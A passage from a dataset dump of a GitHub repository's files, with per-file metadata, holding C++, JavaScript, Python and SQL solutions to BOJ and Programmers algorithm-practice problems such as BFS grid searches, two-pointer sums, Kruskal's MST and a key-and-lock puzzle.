!= str.end()) ans++;\n }\n\n cout << ans;\n \n return 0;\n}" }, { "alpha_fraction": 0.4463452696800232, "alphanum_fraction": 0.48522549867630005, "avg_line_length": 14.707317352294922, "blob_id": "5fdcf43acdfee96fdfa5686cf8cc91f2f6e249ae", "content_id": "e0715134fb6036452b233f3f42996ed0c668b92e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 647, "license_type": "no_license", "max_line_length": 64, "num_lines": 41, "path": "/BOJ/BFS_DFS/15651.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15651번: N과 M (3)\n2022-01-05\nBacktracking\n*/\n#include <iostream>\n#include <vector>\n#define MAX 8\nusing namespace std;\n\nint n, m;\nvector<int> num;\nvector<int> ans; \n\nvoid print(){\n for(int i = 0 ; i < ans.size() ; i++) cout << ans[i] << \" \";\n cout << '\\n';\n}\n\nvoid dfs(int cnt){\n if(cnt == m) {\n print();\n return;\n }\n\n for(int i = 0 ; i < n ; i++){\n ans.push_back(num[i]);\n dfs(cnt + 1);\n ans.pop_back();\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) num.push_back(i + 1);\n dfs(0);\n\n return 0;\n}" }, { "alpha_fraction": 0.3421269655227661, "alphanum_fraction": 0.37922507524490356, "avg_line_length": 18.26984214782715, "blob_id": "45876866444558b2f0b8eb4daa481cac95cff02a", "content_id": "2b19317e328c2a0456ebe92d44bd0d6aa0f9e623", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1239, "license_type": "no_license", "max_line_length": 79, "num_lines": 63, "path": "/BOJ/BFS_DFS/7576.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 7576번: 토마토\nDATE: 2022-02-02\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 1000\nusing namespace std;\n\nqueue<pair<int,int>> q;\nint m, n;\nint arr[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid bfs() {\n while(!q.empty()) {\n int x = q.front().first;\n int y = q.front().second;\n\n q.pop();\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m || arr[nx][ny]) continue;\n\n q.push({nx, ny});\n arr[nx][ny] = arr[x][y] + 1;\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int ans = 0;\n cin >> m >> n;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n cin >> arr[i][j];\n if(arr[i][j] == 1) q.push({i, j});\n }\n }\n\n bfs();\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n if(arr[i][j] == 0) { // 익지 않은 토마토 존재\n cout << -1;\n return 0;\n }\n else if(arr[i][j] > ans) ans = arr[i][j]; \n }\n }\n\n cout << ans - 1;\n\n return 0;\n}" }, { "alpha_fraction": 0.3927038609981537, "alphanum_fraction": 0.42274677753448486, "avg_line_length": 16.60377311706543, "blob_id": "7b919b6cc71f4697d7ef39806fe974284dc40381", "content_id": "df09991450e393f09adf0801f1cd1a684f1a19d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 946, "license_type": "no_license", "max_line_length": 60, "num_lines": 53, "path": "/BOJ/Two Pointer/1644.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1644번: 소수의 연속합\n2021-12-28\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <math.h>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> prime;\n int n;\n int start = 0, end = 0, sum = 0, ans = 0;\n \n cin >> n;\n\n if(n == 1) {\n cout << 0;\n return 0;\n }\n\n int arr[n + 1];\n fill(arr, arr + n + 1, true);\n arr[1] = false;\n\n for(int i = 2 ; i <= sqrt(n) ; i++) {\n if(!arr[i]) continue;\n for(int j = i * i ; j <= n ; j += i) arr[j] = false;\n }\n\n for(int i = 2 ; i <= n ; i++) {\n if(arr[i]) prime.push_back(i);\n }\n\n while(end <= prime.size()) {\n if(sum < n) {\n sum += prime[end];\n end++;\n }\n else if(sum >= n) {\n sum -= prime[start];\n start++;\n }\n\n if(sum == n) ans++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.6214510798454285, "alphanum_fraction": 0.6585173606872559, "avg_line_length": 20.86206817626953, "blob_id": "a34090eadfd8794190cd3d0f0d9a5247c03e76aa", "content_id": "d97d06a259741c215153b88e6a1da188c7448fbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1364, "license_type": "no_license", "max_line_length": 98, "num_lines": 58, "path": "/programmers/SQL/String, Date.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# String, Date\n\n**[1. 루시와 엘라 찾기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59046)**\n\n```sql\nSELECT ANIMAL_ID, NAME, SEX_UPON_INTAKE\nFROM ANIMAL_INS\nWHERE NAME IN ('Lucy', 'Ella', 'Pickle', 'Rogan', 'Sabrina', 'Mitty')\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[2. 이름에 el이 들어가는 동물 찾기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59047)**\n\n```sql\nSELECT ANIMAL_ID, NAME\nFROM ANIMAL_INS\nWHERE NAME LIKE '%el%' and ANIMAL_TYPE = 'Dog'\nORDER BY NAME\n```\n\n<br/>\n\n**[3. 중성화 여부 파악하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59409)**\n\n```sql\nSELECT ANIMAL_ID, NAME,\n CASE\n WHEN SEX_UPON_INTAKE = 'Neutered Male' THEN \"O\"\n WHEN SEX_UPON_INTAKE = \"Spayed Female\" THEN \"O\"\n ELSE \"X\"\n END AS '중성화'\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[4. 오랜 기간 보호한 동물(2) (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/59411)**\n\n```sql\nSELECT A.ANIMAL_ID, B.NAME\nFROM ANIMAL_INS A, ANIMAL_OUTS B\nWHERE A.ANIMAL_ID = B.ANIMAL_ID\nORDER BY B.DATETIME - A.DATETIME DESC\nLIMIT 2\n```\n\n<br/>\n\n**[5. DATETIME에서 DATE로 형 변환 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59414)**\n\n```sql\nSELECT ANIMAL_ID, NAME, DATE_FORMAT(DATETIME, '%Y-%m-%d') as 날짜\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n" }, { "alpha_fraction": 0.42514970898628235, "alphanum_fraction": 0.4565868377685547, "avg_line_length": 15.317072868347168, "blob_id": "ce48eee024318602496c1f27dcb6ac37dc2d3ffe", "content_id": "e23b8cc1747152cc99e71cafd73337c871ef0466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 678, "license_type": "no_license", "max_line_length": 58, "num_lines": 41, "path": "/BOJ/Two Pointer/2230.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2230번: 수 고르기\nDATE: 2022-02-08\nTwo pointer\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n int start, end, minVal = 2e9;\n cin >> n >> m;\n\n int arr[n];\n\n for(int i = 0 ; i < n ; i++) cin >> arr[i];\n sort(arr, arr + n);\n\n start = 0; end = 0;\n\n while(end < n) {\n int diff = arr[end] - arr[start];\n\n if(diff == m) {\n minVal = m;\n break;\n }\n\n if(diff < m) end++;\n else {\n minVal = min(minVal, diff);\n start++;\n }\n }\n\n cout << minVal;\n\n return 0;\n}" }, { "alpha_fraction": 0.5655527114868164, "alphanum_fraction": 0.5938303470611572, "avg_line_length": 17.571428298950195, "blob_id": "944ee0662e665b263d0aa64c8e82f0f03155c76a", "content_id": "91b22b4906353c94669c78ebbc16ef44cd41eac0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 411, "license_type": "no_license", "max_line_length": 52, "num_lines": 21, "path": "/programmers/Level 1/divisible_number_array.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 나누어 떨어지는 숫자 배열\n2022-03-21\n*/\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<int> solution(vector<int> arr, int divisor) {\n vector<int> answer;\n \n sort(arr.begin(), arr.end());\n \n for(auto i : arr){\n if(i % divisor == 0) answer.push_back(i);\n }\n \n if(answer.empty()) answer.push_back(-1);\n \n return answer;\n}" }, { "alpha_fraction": 0.5655737519264221, "alphanum_fraction": 0.5901639461517334, "avg_line_length": 15.681818008422852, "blob_id": "bbbda206e74f2f37ab5b32635cf77e0fbc30fb2e", "content_id": "6eb1da88c2519cb8b95d9c84f4798f36a6abb264", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 408, "license_type": "no_license", "max_line_length": 43, "num_lines": 22, "path": "/programmers/Level 1/gcd_lcm.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 최대공약수와 최소공배수\n2022-03-19\n*/\n#include <string>\n#include <vector>\n\nusing namespace std;\n\nint gcd(int a, int b){\n return b ? gcd(b, a % b) : a;\n}\n\nvector<int> solution(int n, int m) {\n vector<int> answer;\n int res = gcd(n, m);\n \n answer.push_back(res); // 최대공약수\n answer.push_back(n * m / res); // 최소공배수\n \n return answer;\n}" }, { "alpha_fraction": 0.3871449828147888, "alphanum_fraction": 0.4275037348270416, "avg_line_length": 14.581395149230957, "blob_id": "dc0f887e86f66ce5338ea9eb1efc7f5f3da2a995", "content_id": "74dc57f2ff1c7b2ffdafeaf5fb942644be5e496c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 679, "license_type": "no_license", "max_line_length": 58, "num_lines": 43, "path": "/BOJ/Two Pointer/3273.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3273번: 두 수의 합\nDATE: 2021-06-01\nTwo Pointer\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint arr[100001];\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, x;\n cin >> n;\n\n int start = 0, end = n - 1, sum = 0, ans = 0;\n\n for (int i = 0; i < n; i++) {\n cin >> arr[i];\n }\n\n sort(arr, arr + n);\n\n cin >> x;\n\n while (start < end) {\n if (arr[start] + arr[end] == x) {\n ans++;\n start++;\n }\n else if (arr[start] + arr[end] > x) {\n end--;\n }\n else {\n start++;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.5264151096343994, "alphanum_fraction": 0.5584905743598938, "avg_line_length": 20.239999771118164, "blob_id": "2c025ecc499aec55e5c0b4737434d965ec7f1e08", "content_id": "536a8475af2c8a80058fc2f69a7d9680a742b7f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 536, "license_type": "no_license", "max_line_length": 96, "num_lines": 25, "path": "/BOJ/Implementation/5635.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 5635번: 생일\nDATE: 2022-05-26\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n; \n\n vector<pair<pair<int,int>, pair<int, string>>> v(n);\n\n for(int i = 0 ; i < n ; i++){\n cin >> v[i].second.second >> v[i].second.first >> v[i].first.second >> v[i].first.first;\n }\n\n sort(v.begin(), v.end());\n cout << v.back().second.second << \"\\n\" << v.front().second.second;\n\n return 0;\n}" }, { "alpha_fraction": 0.35738831758499146, "alphanum_fraction": 0.38969072699546814, "avg_line_length": 20.101449966430664, "blob_id": "d05f76d03b2e547b09b7b2a883511f660f3627a4", "content_id": "6b01d2aab9b19bae71a528dcb252ed0bd23c3b7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1457, "license_type": "no_license", "max_line_length": 83, "num_lines": 69, "path": "/BOJ/BFS_DFS/1012.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1012번: 유기농 배추\nDATE: 2021-10-25\nBFS\n*/\n#include <iostream>\n#include <string.h>\n#include <queue>\nusing namespace std;\n\nint arr[50][50];\nbool visited[50][50];\nint m, n;\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid bfs(int x, int y) {\n queue<pair<int,int>> q;\n\n q.push(make_pair(x, y));\n visited[x][y] = true;\n\n while(!q.empty()) {\n pair<int, int> cur = q.front();\n q.pop();\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = cur.first + dx[i];\n int ny = cur.second + dy[i];\n \n if(nx < 0 || ny < 0 || nx >= n || ny >= m || visited[nx][ny]) continue;\n if(arr[nx][ny] == 0) continue;\n \n q.push(make_pair(nx, ny));\n visited[nx][ny] = true;\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t, k, x, y;\n cin >> t;\n\n for(int i = 0 ; i < t ; i++) {\n int cnt = 0;\n cin >> m >> n >> k;\n memset(arr, 0, sizeof(arr));\n memset(visited, false, sizeof(visited));\n\n for(int j = 0 ; j < k ; j++) {\n cin >> x >> y;\n arr[y][x] = 1;\n }\n\n for(int j = 0 ; j < n ; j++) {\n for(int k = 0 ; k < m ; k++) {\n if(arr[j][k] == 1 && !visited[j][k]) {\n cnt++;\n bfs(j, k);\n }\n }\n }\n\n cout << cnt << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3900826573371887, "alphanum_fraction": 0.42975205183029175, "avg_line_length": 23.239999771118164, "blob_id": "d06d15ac011ca165246bef7699f95db26391a680", "content_id": "cee333d89aa8e7c9d469e70de4531090e2ee7936", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 605, "license_type": "no_license", "max_line_length": 73, "num_lines": 25, "path": "/programmers/Level 1/push_keypad.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: Push keypad\n2020 KAKAO Internship\n2021-12-21\n*/\nfunction solution(board, moves) {\n let answer = 0;\n let stack = [];\n\n for (let i = 0; i < moves.length; i++) {\n for (let j = 0; j < board.length; j++) {\n if (board[j][moves[i] - 1] > 0) {\n if (stack[stack.length - 1] === board[j][moves[i] - 1]) {\n answer += 2;\n stack.pop();\n } else stack.push(board[j][moves[i] - 1]);\n\n board[j][moves[i] - 1] = 0;\n break;\n }\n }\n }\n\n return answer;\n}" }, { "alpha_fraction": 0.3349548280239105, "alphanum_fraction": 0.36970117688179016, "avg_line_length": 21.5, "blob_id": "6266134139d6b1b74aad188f3a51ab0b409f13b0", "content_id": "f8802503f8f3d5b07632ff0a1b3ac86f00a750ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1553, "license_type": "no_license", "max_line_length": 94, "num_lines": 64, "path": "/BOJ/BFS_DFS/17070.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17070번: 파이프 옮기기 1\n2021-12-20\n*/\n#include <iostream>\n#define MAX 32\nusing namespace std;\n\nint n, ans = 0;\nint arr[MAX][MAX];\nbool visited[MAX][MAX] = {false, };\nint dx[3] = {0, 1, 1}; //가로, 세로, 대각선\nint dy[3] = {1, 0, 1};\n\nvoid dfs(int x, int y, int dir) {\n //d => 0: 가로 1: 세로 2: 대각선\n\n if(x == n - 1 && y == n - 1) {\n ans++;\n return;\n }\n\n visited[x][y] = true;\n\n for(int i = 0 ; i < 3 ; i++) {\n if(dir == 0 && i == 1) continue; // 파이프 가로 && 세로 방향으로 이동\n else if(dir == 1 && i == 0) continue; // 파이프 세로 && 가로 방향으로 이동\n else {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n) continue;\n \n if(i < 2) { // 가로, 세로로 이동\n if(!arr[nx][ny] && !visited[nx][ny]) {\n dfs(nx, ny, i);\n visited[nx][ny] = false;\n }\n }\n else { //대각선\n if(!arr[nx][ny] && !arr[nx - 1][ny] && !arr[nx][ny - 1] && !visited[nx][ny]) {\n dfs(nx, ny, i);\n visited[nx][ny] = false;\n }\n }\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n cin >> arr[i][j];\n }\n }\n\n dfs(0, 1, 0);\n\n cout << ans;\n return 0;\n}" }, { "alpha_fraction": 0.49655961990356445, "alphanum_fraction": 0.517201840877533, "avg_line_length": 16.816326141357422, "blob_id": "7fea9ec05dd7c573a6da6fe0efbe4d4a36be2b75", "content_id": "9ad0997e9d508a155bba2e7ec5348f77f661c5fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 880, "license_type": "no_license", "max_line_length": 61, "num_lines": 49, "path": "/programmers/Level 2/find_prime_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2: 소수 찾기\n//2021-10-09\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <iostream>\n#include <math.h>\nusing namespace std;\n\nbool isPrime(int num) {\n if(num < 2) return false;\n \n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n \n return true;\n}\n\nint solution(string numbers) {\n int answer = 0;\n vector<string> v;\n set<int> s;\n\n sort(numbers.begin(), numbers.end());\n \n do {\n string str;\n \n for(int i = 0 ; i < numbers.size() ; i++) {\n str += numbers[i];\n s.insert(stoi(str));\n }\n \n }while(next_permutation(numbers.begin(), numbers.end()));\n\n for(auto i : s) {\n if(isPrime(i)) answer++;\n }\n \n return answer;\n}\n\nint main() {\n int answer = solution(\"011\");\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.483205646276474, "alphanum_fraction": 0.49911609292030334, "avg_line_length": 22.91549301147461, "blob_id": "b1708c82a2d867c8b8d43cd2c6fccda30c6c9a61", "content_id": "a0d45f4bf1f30c9e0dbffc46f4f005cd2a17d7f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1763, "license_type": "no_license", "max_line_length": 88, "num_lines": 71, "path": "/programmers/Level 2/rank_search.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 순위 검색\n2021 KAKAO BLIND RECRUITMENT\n2022-04-18\n*/\n#include <string>\n#include <vector>\n#include <sstream>\n#include <algorithm>\n#include <unordered_map>\nusing namespace std;\n\nunordered_map<string, vector<int>> m; \n\nvector<string> split(string str, char del){\n vector<string> ret;\n istringstream iss(str);\n string buffer;\n \n while(getline(iss, buffer, del)) ret.push_back(buffer);\n \n return ret;\n}\n\nvoid getCombination(vector<string> v){\n for(int i = 0 ; i < 16 ; i++){\n string tmp;\n \n for(int j = 0 ; j < 4 ; j++){\n if(i & (1 << j)) tmp += \"-\";\n else tmp += v[j];\n }\n \n m[tmp].push_back(stoi(v[4]));\n }\n}\n\nvector<int> solution(vector<string> info, vector<string> query) {\n vector<int> answer;\n \n for(int i = 0 ; i < info.size() ; i++){\n vector<string> ret = split(info[i], ' ');\n getCombination(ret); // 해당 info로 만들 수 있는 모든 조합 만들고 점수 삽입\n }\n \n for(auto &i : m){\n sort(i.second.begin(), i.second.end());\n }\n \n for(int i = 0 ; i < query.size() ; i++){\n vector<string> ret = split(query[i], ' ');\n string tmp;\n \n for(int j = 0 ; j < ret.size() - 1 ; j++){\n if(ret[j] == \"and\") continue;\n tmp += ret[j];\n }\n \n vector<int> scores = m[tmp]; // query 조건을 만족하는 점수들\n \n if(scores.size() == 0) answer.push_back(0);\n else{\n int score = stoi(ret[7]);\n int idx = lower_bound(scores.begin(), scores.end(), score) - scores.begin();\n \n answer.push_back(scores.size() - idx);\n }\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.4604026973247528, "alphanum_fraction": 0.4899328947067261, "avg_line_length": 18.128204345703125, "blob_id": "cbb9aae785b0e766bfbd4db92c4045f35b2ef780", "content_id": "b70a9d03a3e29b85991c75a7a1db92ca799799c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 761, "license_type": "no_license", "max_line_length": 70, "num_lines": 39, "path": "/programmers/Level 3/immigration.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 3: 입국심사\n이분탐색\n2021-12-19\n*/\n#include <vector>\n#include <algorithm>\n#include <iostream>\n#define MAX 1e18\nusing namespace std;\n\nlong long solution(int n, vector<int> times) {\n long long answer = MAX;\n long long start = 0, end = MAX, mid, sum;\n \n sort(times.begin(), times.end());\n \n while(start <= end) {\n sum = 0;\n mid = (start + end) / 2;\n \n for(int i = 0 ; i < times.size() ; i++) sum += mid / times[i];\n \n if(sum >= n) {\n end = mid - 1;\n answer = min(mid, answer);\n }\n else {\n start = mid + 1;\n }\n }\n \n return answer;\n}\n\nint main() {\n long long answer = solution(6, {7, 10});\n cout << answer;\n}" }, { "alpha_fraction": 0.5010941028594971, "alphanum_fraction": 0.5470459461212158, "avg_line_length": 15.962963104248047, "blob_id": "7f9945080329a08f09e8279bd7cc5a5f23f9124c", "content_id": "fed28e2efc8ea44410ac416fe04233986a9c9efd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 465, "license_type": "no_license", "max_line_length": 85, "num_lines": 27, "path": "/BOJ/Implementation/4358.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 4358번: 생태학\nDATE: 2022-03-11\n*/\n#include <iostream>\n#include <string>\n#include <map>\nusing namespace std;\n\nmap<string, int> m;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n int total = 0;\n\n while(getline(cin, str)){\n m[str]++;\n total++;\n }\n\n cout << fixed;\n cout.precision(4);\n for(auto i : m) cout << i.first << \" \" << (double)i.second / total * 100 << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.42171189188957214, "alphanum_fraction": 0.5114822387695312, "avg_line_length": 11.972972869873047, "blob_id": "b739c099b970145dda8f6237edaec93f725ed60e", "content_id": "11707c0636205c0f9e6603eda9c7c9fc0b15070f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 489, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/BOJ/Implementation/4673.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 4673번: 셀프 넘버\n2021-03-23\n*/\n#include <iostream>\n\nusing namespace std;\n\nint d(int num) {\n\tint sum = num;\n\n\twhile (num != 0) {\n\t\tsum += num % 10;\n\t\tnum = num / 10;\n\t}\n\n\treturn sum;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tbool arr[10001] = { false, };\n\n\tfor (int i = 1; i <= 10000; i++) {\n\t\tint idx = d(i);\n\n\t\tif(idx <= 10000)\n\t\t\tarr[idx] = true;\n\t}\n\n\tfor (int i = 1; i <= 10000; i++) {\n\t\tif (!arr[i])\n\t\t\tcout << i << endl;\n\t}\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.5260663628578186, "alphanum_fraction": 0.5734597444534302, "avg_line_length": 22.55555534362793, "blob_id": "5c65ce2123fef822b4f11609bd978d7560ba6ca0", "content_id": "b51848a67e7029614e6e03f0a3d5aa0d7fb31a40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 40, "num_lines": 9, "path": "/programmers/Level 1/add_yin_and_yang.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: 음양 더하기\n# date: 2022-04-14\ndef solution(absolutes, signs):\n answer = 0\n \n for a, s in zip(absolutes, signs):\n answer += a if s == True else -a\n \n return answer" }, { "alpha_fraction": 0.4934593141078949, "alphanum_fraction": 0.5167151093482971, "avg_line_length": 19.55223846435547, "blob_id": "482c180d00faa124070474b46b4ec649b70c0d13", "content_id": "e31c5aa92ee9645e3d976030e134286f5d54c19b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1390, "license_type": "no_license", "max_line_length": 59, "num_lines": 67, "path": "/BOJ/MST/1647.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1647번: 도시 분할 계획\n2021-12-29\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 1000001\nusing namespace std;\n\npair<int, pair<int,int>> edge[MAX];\n\nint getParent(int parent[], int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int n, m;\n int a, b, c;\n int ans = 0, cnt = 0;\n cin >> n >> m;\n\n int parent[n + 1];\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> a >> b >> c;\n edge[i].first = c; \n edge[i].second.first = a;\n edge[i].second.second = b;\n }\n\n sort(edge, edge + m);\n\n for(int i = 0 ; i < m ; i++) {\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n int c = edge[i].first;\n\n if(findParent(parent, a, b)) continue;\n \n unionParent(parent, a, b);\n ans += c;\n if(++cnt == n - 2) break;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.44155845046043396, "alphanum_fraction": 0.5038961172103882, "avg_line_length": 13.84615421295166, "blob_id": "bf01d2ff2ecd6bcb99924adb2308793a031966d5", "content_id": "7f1261c11d6ac52245382ff674d2de57709c8227", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 393, "license_type": "no_license", "max_line_length": 58, "num_lines": 26, "path": "/BOJ/Dynamic Programming/2193.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2193번: 이친수\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\n#define MAX 91\nusing namespace std;\n\nlong long dp[MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n dp[1] = dp[2] = 1;\n\n for(int i = 3 ; i < MAX ; i++){\n dp[i] = dp[i - 1] + dp[i - 2];\n }\n\n cout << dp[n] << '\\n';\n \n return 0;\n}" }, { "alpha_fraction": 0.3906829059123993, "alphanum_fraction": 0.4203282296657562, "avg_line_length": 22.625, "blob_id": "de5e573292c3d8c854669c6c92626a51709acb46", "content_id": "a2c8ffe4a254dd4c4cf43c489d5de3700b44702c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1889, "license_type": "no_license", "max_line_length": 75, "num_lines": 80, "path": "/programmers/Level 3/lock_and_key.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 3 : Lock and Key\n//2020 KAKAO BLIND RECRUITMENT\n//2021-05-29\n#include <string>\n#include <vector>\n#include <iostream>\nusing namespace std;\n\nbool sum(int x, int y, vector<vector<int>> key, vector<vector<int>> board){\n int M = key.size();\n int bs = board.size();\n \n for(int i = 0 ; i < M ; i++){\n for(int j = 0 ; j < M ; j++){\n board[x + i][y + j] += key[i][j];\n }\n }\n \n for(int i = M - 1 ; i < bs - M + 1; i++){\n for(int j = M - 1 ; j < bs - M + 1 ; j++){\n if(board[i][j] != 1)\n return false;\n }\n }\n \n return true;\n}\n\nvector<vector<int>> rotate(vector<vector<int>> key){\n int M = key.size();\n vector<vector<int>> tmp(M, vector<int>(M, 0));\n \n for(int i = 0 ; i < M ; i++){\n for(int j = 0 ; j < M ; j++){\n tmp[i][j] = key[M - j - 1][i];\n }\n }\n \n key = tmp;\n return key;\n}\n\nbool solution(vector<vector<int>> key, vector<vector<int>> lock) {\n bool answer = false;\n \n int M = key.size();\n int N = lock.size();\n int bs = lock.size() + (key.size() - 1)*2;\n vector<vector<int>> board(bs, vector<int>(bs, 0));\n \n for(int i = 0 ; i < N ; i++){\n for(int j = 0 ; j < N ; j++){\n board[i + M - 1][j + M - 1] = lock[i][j];\n }\n }\n \n for(int i = 0 ; i < 4 ; i++){\n for(int j = 0 ; j < M+N-1 ; j++){\n for(int k = 0 ; k < M+N-1 ; k++){\n if(sum(j, k , key, board)){\n answer = true;\n return answer;\n }\n }\n }\n key = rotate(key);\n }\n \n return answer;\n}\n\nint main(){\n vector<vector<int>> key = {{0, 0, 0}, {1, 